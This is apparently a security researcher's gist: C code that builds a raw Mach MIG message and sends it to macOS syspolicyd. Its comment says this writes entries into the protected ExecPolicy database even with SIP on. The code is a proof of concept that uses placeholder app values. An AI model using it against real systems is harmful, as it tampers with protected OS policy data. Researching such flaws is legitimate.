@knightsc knightsc/aspmig.c
Created Feb 14, 2019

Example of sending a notify_32bit_exec MIG message to syspolicyd
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
/*
This allows you to write to /var/db/SystemPolicyConfiguration/ExecPolicy
even with SIP on. Basically before syspolicyd determines if the values
you pass can be checked or not it will save them to the ExecPolicy
database.
There are still errors when passing in a real application.
default 08:22:28.588787 -0500 trustd asynchronously fetching CRL (http://crl.apple.com/root.crl) for client (syspolicyd[1977]/0#-1 LF=0)
default 08:22:28.617267 -0500 syspolicyd -[LSCodeEvaluationClientManager handlePromptResponse:info:identifier:]: response: 2 info: <private>
error 08:22:28.617885 -0500 syspolicyd failed to call driver: 0x3
*/
/*
 * Hand-laid-out wire format of the request sent from main() (msgh_id 0x48a8).
 * NOTE(review): the layout looks recovered by observation rather than taken
 * from a MIG .defs file — u1..u6 are fields whose meaning is not identified.
 * Every variable-length string is sent as a fixed-size, NUL-padded buffer
 * preceded by a field carrying its capacity. sizeof(struct message) is used
 * as msgh_size, so any change to this struct changes the bytes on the wire.
 */
struct message {
    mach_msg_header_t hdr;      /* standard Mach header; msgh_id selects the routine */
    uint32_t u1;                /* not identified; sent as 0 */
    uint32_t u2;                /* not identified; sent as 1 */
    uint32_t eval_id;           /* sent as 2 by the sample */
    uint32_t u3;                /* not identified; sent as 0 */
    uid_t uid;                  /* presumably the uid of the reported process — confirm */
    pid_t pid;                  /* presumably the pid of the reported process — confirm */
    uint32_t u4;                /* not identified; sent as 0 */
    uint32_t path_size;         /* capacity of path[] (1024) */
    char path[1024];            /* NUL-padded path string */
    uint32_t u5;                /* not identified; sent as 0 */
    uint32_t team_id_size;      /* capacity of team_id[] (64) */
    char team_id[64];           /* NUL-padded team identifier string */
    uint32_t u6;                /* not identified; sent as 0 */
    uint32_t signing_id_size;   /* capacity of signing_id[] (128) */
    char signing_id[128];       /* NUL-padded signing identifier string */
    char cdhash[20];            /* 20 raw bytes, NOT a NUL-terminated string */
};
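/*
 * Entry point. Builds a single hand-rolled MIG request (msgh_id 0x48a8 — the
 * notify_32bit_exec routine, per the gist description) describing a
 * fictitious application and sends it one-way to syspolicyd's host special
 * port. argc/argv are unused: every field is a fixed sample value.
 *
 * Returns 0 once mach_msg() reports success. On the first failing Mach call
 * the kern_return_t is printed to stderr and the process exits with
 * EXIT_FAILURE. Obtaining host_priv presumably needs a privileged caller.
 */
int
main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    enum { NOTIFY_32BIT_EXEC_MSG_ID = 0x48a8 };

    /* Sample payload values (constructed placeholders, same as the original). */
    static const char sample_path[] = "/Applications/FakeApp.app";
    static const char sample_team_id[] = "ABCDEFGHIJ";
    static const char sample_signing_id[] = "com.fake.bundle.Id";
    static const unsigned char sample_cdhash[20] = {
        0xd7, 0x4a, 0x6b, 0x33, 0x0a, 0x8c, 0x67, 0xc4, 0x8f, 0xc0,
        0xf8, 0xbb, 0xc7, 0xe0, 0xdc, 0x46, 0x55, 0xe2, 0x44, 0xb8
    };
    const uid_t sample_uid = 502;
    const pid_t sample_pid = 1;

    /* Zero-filled so no unset byte is left as stack garbage when the whole
     * struct crosses the IPC boundary. */
    struct message msg = {0};

    /* The literals must fit their buffers; checked at compile time so the
     * memcpy calls below are bounded without runtime truncation handling. */
    _Static_assert(sizeof sample_path <= sizeof msg.path, "path literal too long");
    _Static_assert(sizeof sample_team_id <= sizeof msg.team_id, "team_id literal too long");
    _Static_assert(sizeof sample_signing_id <= sizeof msg.signing_id, "signing_id literal too long");
    _Static_assert(sizeof sample_cdhash == sizeof msg.cdhash, "cdhash must be exactly 20 bytes");

    kern_return_t kr;
    mach_port_t host = mach_host_self();
    mach_port_t host_priv = MACH_PORT_NULL;
    mach_port_t asp_port = MACH_PORT_NULL;

    kr = host_get_host_priv_port(host, &host_priv);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Error getting host_priv port (kr=%d)\n", kr);
        return EXIT_FAILURE;
    }
    kr = host_get_special_port(host_priv, HOST_LOCAL_NODE, HOST_SYSPOLICYD_PORT, &asp_port);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Error getting syspolicyd mig port (kr=%d)\n", kr);
        return EXIT_FAILURE;
    }
    /* The two host rights are no longer needed once asp_port is in hand. */
    (void)mach_port_deallocate(mach_task_self(), host_priv);
    (void)mach_port_deallocate(mach_task_self(), host);

    /* Simple (non-complex) message with inline data only. The send right to
     * asp_port is MOVED into the header, so mach_msg() consumes the name and
     * asp_port must not be used after the call. No reply port: one-way. */
    msg.hdr.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MOVE_SEND);
    msg.hdr.msgh_size = (mach_msg_size_t)sizeof msg;
    msg.hdr.msgh_remote_port = asp_port;
    msg.hdr.msgh_local_port = MACH_PORT_NULL;
    msg.hdr.msgh_voucher_port = MACH_PORT_NULL;
    msg.hdr.msgh_id = NOTIFY_32BIT_EXEC_MSG_ID;

    /* u1..u6 are unidentified fields; the values are those the original
     * sample sent. */
    msg.u1 = 0;
    msg.u2 = 1;
    msg.eval_id = 2;
    msg.u3 = 0;
    msg.uid = sample_uid;
    msg.pid = sample_pid;
    msg.u4 = 0;
    msg.u5 = 0;
    msg.u6 = 0;

    /* Each string travels as a fixed-size, NUL-padded buffer preceded by its
     * capacity; the capacity is derived from the array rather than repeated
     * as a literal. Copying the full literal includes its terminating NUL,
     * and the remainder of each buffer is already zero. */
    msg.path_size = sizeof msg.path;
    memcpy(msg.path, sample_path, sizeof sample_path);
    msg.team_id_size = sizeof msg.team_id;
    memcpy(msg.team_id, sample_team_id, sizeof sample_team_id);
    msg.signing_id_size = sizeof msg.signing_id;
    memcpy(msg.signing_id, sample_signing_id, sizeof sample_signing_id);
    /* cdhash is raw bytes, not a C string: memcpy, never strncpy, which would
     * stop early at any 0x00 byte. */
    memcpy(msg.cdhash, sample_cdhash, sizeof msg.cdhash);

    kr = mach_msg(&msg.hdr,
                  MACH_SEND_MSG,
                  msg.hdr.msgh_size,
                  0,
                  MACH_PORT_NULL,
                  MACH_MSG_TIMEOUT_NONE,
                  MACH_PORT_NULL);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "Error sending mach msg (kr=%d)\n", kr);
        return EXIT_FAILURE;
    }
    return 0;
}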